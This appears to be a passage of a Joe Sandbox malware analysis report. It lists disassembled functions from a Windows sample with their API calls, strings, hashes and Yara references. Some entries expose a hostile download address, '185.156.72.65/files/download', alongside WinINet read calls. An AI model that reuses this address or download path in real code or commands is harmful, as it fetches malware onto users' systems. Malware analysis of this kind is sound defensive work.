                        • String ID: 185.156.72.65$185.156.72.65$mixone
                        • API String ID: 4111408922-485810328
                        • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                        • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                        • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                        • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                        Function 04959E44 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04959E22), ref: 04959E50
                        • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04959E22), ref: 04959E5B
                        • GetModuleHandleW.KERNEL32(0042000C,?,?,04959E22), ref: 04959E6C
                        • GetProcAddress.KERNEL32(00000000,00420028), ref: 04959E7E
                        • GetProcAddress.KERNEL32(00000000,00420044), ref: 04959E8C
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04959E22), ref: 04959EAF
                        • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04959ECB
                        • CloseHandle.KERNEL32(0042D060,?,?,04959E22), ref: 04959EDB
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID:
                        • API String ID: 2565136772-0
                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction ID: f95af81ad5315ca355b259ccfb780d6e2e4be1318cf8d3b911b16a674888c97b
                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction Fuzzy Hash: C0015271F40711EBE7209BB4BC0DB9B3AECAB48705B604135BD05E2171DB78D80B8B68
                        Function 00413E0C Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                        • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                        • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                        • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                        Function 04964073 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                        • Instruction ID: 79f55e3a299b863bd512580f25b7e7a2d94f51e119f061a2853a0a3e81ce9c19
                        • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                        • Instruction Fuzzy Hash: BCB16B32A00365AFEB11CF98CC81FAE7BA9EF95314F154175E906AF281D274B901CBA5
                        Function 00401600 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                          • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                        • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65$string too long
                        • API String ID: 2123813255-2459586365
                        • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                        • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                        • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                        • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                        Function 0040B800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                        Download Yara Rule
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 0040B837
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                        • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                        • _ValidateLocalCookies.LIBCMT ref: 0040B948
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                        Function 00413379 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3664257935-537541572
                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                        Function 0040B9C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                        • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                        Function 0495BC2B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0495BC47
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0495BC60
                        • SetLastError.KERNEL32(00000000,0495BC22,0495B1C6,0495A9D7), ref: 0495BCB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction ID: fa83bc30c76dc1b346922600d2384d1d63f280bec9cd6f43eb71c9ca7c8fbf1c
                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction Fuzzy Hash: 1901B5322097119EB735ABBCFCC5A5B2A68EB4167C3704239ED24950F1EF5178055348
                        Function 04951867 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 0495186C
                          • Part of subcall function 04959AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04959AF5
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518D9
                        • Concurrency::cancel_current_task.LIBCPMT ref: 049519EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65
                        • API String ID: 2123813255-1765470537
                        • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                        • Instruction ID: a7ed5558de41f27cae143ab3c72e322dddedd3e6f85bbaf2a4dca6a38d894550
                        • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                        • Instruction Fuzzy Hash: 1941D7B1E00301EBE724DF64AC86B5AB6F8EF44214F300639ED5AD72A0E771B944C7A1
                        Function 004105C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B6DBD0D4,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                        • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                        • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                        • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                        • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                        Function 00415050 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                        Download Yara Rule
                        APIs
                        • __alloca_probe_16.LIBCMT ref: 004150D5
                        • __alloca_probe_16.LIBCMT ref: 0041519E
                        • __freea.LIBCMT ref: 00415205
                          • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        • __freea.LIBCMT ref: 00415218
                        • __freea.LIBCMT ref: 00415225
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 1423051803-0
                        • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                        • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                        • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                        • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                        Function 04952CB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04952D82
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04952D9D
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                        • String ID:
                        • API String ID: 2509773233-0
                        • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                        • Instruction ID: ad75ccc773eceebc192db8fb39c2314cbaead7f3e8e0fd29d23a60f79af1df4f
                        • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                        • Instruction Fuzzy Hash: 9131E532B00104AFEB14DF58DC40FAAB7B8EF48700F6541F9ED059B2A2DB31A916CB94
                        Function 00401330 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004013BB
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 2296764815-3011832937
                        • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                        • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                        • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                        • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                        Function 04951597 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04951622
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 4132704954-3011832937
                        • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction ID: f2a4a027ef8a0ee0b3476cacc3b775bdd46468fee5a2291894e2f4cb192b192f
                        • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction Fuzzy Hash: 2F2146B0F00244DAE730DF29E8467A9B3A0FB55308FB48279DC455B271DBB52986CB09
                        Function 0040CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                        • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                        • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                        Function 004196CC Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleOutputCP.KERNEL32(B6DBD0D4,00000000,00000000,00000000), ref: 0041972F
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                        • GetLastError.KERNEL32 ref: 00419A6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                        • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                        Function 04969933 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04969996
                          • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04969BE8
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04969C2E
                        • GetLastError.KERNEL32 ref: 04969CD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction ID: 090ace3839b3da5c97d2318d0a6ade9401a9e7bae4a9c71c157b85b3dba30f2d
                        • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction Fuzzy Hash: F3D16BB5E002489FCF15CFE8D8809ADBBF9FF49314F28456AE45AEB351D630A946CB50
                        Function 04951BD7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID:
                        • API String ID: 3197321146-0
                        • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction ID: eb7b93129c0bd39a399fa667d664963be0dca8c4f381e32a02064f17c29549db
                        • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction Fuzzy Hash: E2C14B70900218DFEB24DF64CC85BE9B7B9EF49304F2041E9E909A72A0D775BA84CF95
                        Function 0040BAA4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                        Function 0495BD0B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: 5cc4e608ba870c86061b251413a45c7d5df544701d674f89a2be05a2e5113e03
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: AE51A2B2601606AFEB29DF14D889BBA77A9EF40314F38453DDE054B6B0E731B954CB90
                        Function 004174E4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • GetLastError.KERNEL32 ref: 00417548
                        • __dosmaperr.LIBCMT ref: 0041754F
                        • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                        • __dosmaperr.LIBCMT ref: 00417590
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                        Function 0496774B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                        • GetLastError.KERNEL32 ref: 049677AF
                        • __dosmaperr.LIBCMT ref: 049677B6
                        • GetLastError.KERNEL32(?,?,?,?), ref: 049677F0
                        • __dosmaperr.LIBCMT ref: 049677F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
